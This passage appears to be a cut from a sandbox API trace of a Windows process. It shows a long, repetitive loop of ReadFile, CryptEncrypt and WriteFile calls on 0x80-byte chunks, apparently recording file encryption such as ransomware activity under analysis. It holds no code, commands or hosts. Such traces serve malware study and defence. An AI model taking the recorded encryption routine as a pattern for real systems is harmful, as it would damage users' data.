lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.072] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.072] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.072] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.072] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.072] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.072] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.072] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.072] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.073] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.073] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.073] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.073] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.073] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.073] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.073] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.073] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.073] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.073] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.074] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.074] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.074] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.074] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.074] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.074] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.074] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.074] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.074] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.075] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.075] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.075] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.075] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.075] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.075] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.075] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.075] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.075] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.075] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.076] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.076] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, 